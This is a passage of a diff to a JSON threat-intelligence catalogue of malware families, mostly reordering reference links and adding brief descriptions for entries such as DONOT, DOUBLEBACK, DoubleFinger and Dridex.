"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2019/VB2019-Mercer-Rascagneres.pdf", + "https://www.mandiant.com/resources/blog/global-dns-hijacking-campaign-dns-record-manipulation-at-scale", + "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", + "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", + "https://www.youtube.com/watch?v=ws1k44ZhJ3g", + "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/", - "https://nsfocusglobal.com/apt34-event-analysis-report/" + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" ], "synonyms": [ "Agent Drable", @@ -22088,8 +23136,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino", - "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/", - "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor" + "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor", + "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/" ], "synonyms": [], "type": [] @@ -22097,13 +23145,27 @@ "uuid": "37169b2f-344e-4913-ab91-d447d597ffa7", "value": "Minodo" }, + { + "description": "Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot", + "https://labs.k7computing.com/index.php/the-donot-apt/", + "https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc", + "value": "DONOT" + }, { "description": "Donut is an open-source in-memory injector/loader, designed for execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It was used during attacks against U.S. organisations according to Threat Hunter Team (Symantec) and U.S. Defence contractors (Unit42).\r\nGithub: https://github.com/TheWover/donut", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector", - "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", "https://thewover.github.io/Introducing-Donut/" ], "synonyms": [ @@ -22119,9 +23181,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme", + "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns", + "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/", - "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry", - "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" + "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" ], "synonyms": [], "type": [] @@ -22134,20 +23197,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex", - "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/", - "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/", "https://twitter.com/BrettCallow/status/1453557686830727177?s=20", - "https://blogs.blackberry.com/en/2021/11/zebra2104", - "https://redcanary.com/blog/grief-ransomware/", - "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/", - "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", + "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://redcanary.com/blog/grief-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/", + "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/", + "https://blogs.blackberry.com/en/2021/11/zebra2104", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", "https://cyber-anubis.github.io/malware%20analysis/dridex/", + "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true", + "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays", "https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware" ], "synonyms": [], @@ -22161,65 +23224,65 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen", + "https://twitter.com/BrettCallow/status/1453557686830727177?s=20", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c", - "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", - "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://twitter.com/vikas891/status/1385306823662587905", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/", + "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://www.ic3.gov/Media/News/2020/201215-1.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", - "https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/", - "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html", + "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c", "https://twitter.com/AltShiftPrtScn/status/1385103712918642688", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://twitter.com/BrettCallow/status/1453557686830727177?s=20", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://techcrunch.com/2020/03/01/visser-breach/", - "https://www.secureworks.com/research/threat-profiles/gold-heron", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-heron", - "https://www.ic3.gov/Media/News/2020/201215-1.pdf", - "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/", "https://redcanary.com/blog/grief-ransomware/", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "http://www.secureworks.com/research/threat-profiles/gold-heron", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://techcrunch.com/2020/03/01/visser-breach/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding", - "https://twitter.com/vikas891/status/1385306823662587905" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "Pay OR Grief" @@ -22235,9 +23298,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", + "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/", - "https://research.checkpoint.com/dorkbot-an-investigation/", - "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/" + "https://research.checkpoint.com/dorkbot-an-investigation/" ], "synonyms": [], "type": [] @@ -22264,10 +23327,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dosia", - "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/", + "https://viuleeenz.github.io/posts/2023/05/extracting-ddosia-targets-from-process-memory/", "https://medium.com/@b42labs/data-insights-from-russian-cyber-militants-noname057-9f4db98f60e", + "https://noname.be42late.co/", + "https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/", "https://decoded.avast.io/martinchlumecky/ddosia-project-how-noname05716-is-trying-to-improve-the-efficiency-of-ddos-attacks/", - "https://www.team-cymru.com/post/a-blog-with-noname" + "https://www.team-cymru.com/post/a-blog-with-noname", + "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/" ], "synonyms": [ "DDOSIA" @@ -22306,7 +23372,7 @@ "value": "Dot Ransomware" }, { - "description": "", + "description": "DOUBLEBACK is a newly discovered fileless malware deployed as part of an attack campaign that took place in December 2020. The threat actors responsible for the operations are tracked as UNC2529 by researchers. According to their findings, DOUBLEBACK is the final payload delivered onto the compromised systems. Its task is to establish and maintain a backdoor on the victim's machine. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback", @@ -22324,9 +23390,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy", + "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", - "https://twitter.com/Int2e_/status/1294565186939092994", - "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/" + "https://twitter.com/Int2e_/status/1294565186939092994" ], "synonyms": [ "VALIDATOR" @@ -22336,13 +23402,26 @@ "uuid": "46a523ca-be25-4f59-bc01-2c006c58bf80", "value": "DoubleFantasy (Windows)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger", + "https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4f1e5142-0f62-48ee-a4a7-d8072fd78dcf", + "value": "DoubleFinger" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor" ], @@ -22357,24 +23436,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublezero", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://cert.gov.ua/article/38088", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero", "https://unit42.paloaltonetworks.com/doublezero-net-wiper/", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html", "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html" + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html", + "https://cert.gov.ua/article/38088" ], "synonyms": [ "FiberLake" @@ -22389,10 +23468,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf", - "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" + "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/" ], "synonyms": [ "DELPHACY" @@ -22407,8 +23486,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", - "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] @@ -22421,9 +23500,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", - "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf", "http://www.clearskysec.com/charmingkitten/", - "https://www.infinitumit.com.tr/apt-35/" + "https://www.infinitumit.com.tr/apt-35/", + "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" ], "synonyms": [], "type": [] @@ -22448,10 +23527,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus", - "http://blog.nsfocus.net/stumbzarus-apt-lazarus/", - "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" + "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/", + "http://blog.nsfocus.net/stumbzarus-apt-lazarus/" + ], + "synonyms": [ + "ThreatNeedle" ], - "synonyms": [], "type": [] }, "uuid": "1ff3afab-8b3f-4b9c-90c7-61062d2dfe0b", @@ -22462,12 +23545,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", - "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality", "https://community.riskiq.com/article/30f22a00", "https://lokalhost.pl/gozi_tree.txt", - "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality", + "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122" ], @@ -22482,121 +23565,121 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://community.riskiq.com/article/2cd1c003", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://www.youtube.com/watch?v=1VB15_HgUkg", - "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", - "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", - "https://unit42.paloaltonetworks.com/travel-themed-phishing/", - "https://cyber-anubis.github.io/malware%20analysis/dridex/", - "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office", - "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", - "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://assets.virustotal.com/reports/2021trends.pdf", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", + "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", "https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://en.wikipedia.org/wiki/Maksim_Yakubets", + "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://home.treasury.gov/news/press-releases/sm845", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", "https://artik.blue/malware3", - 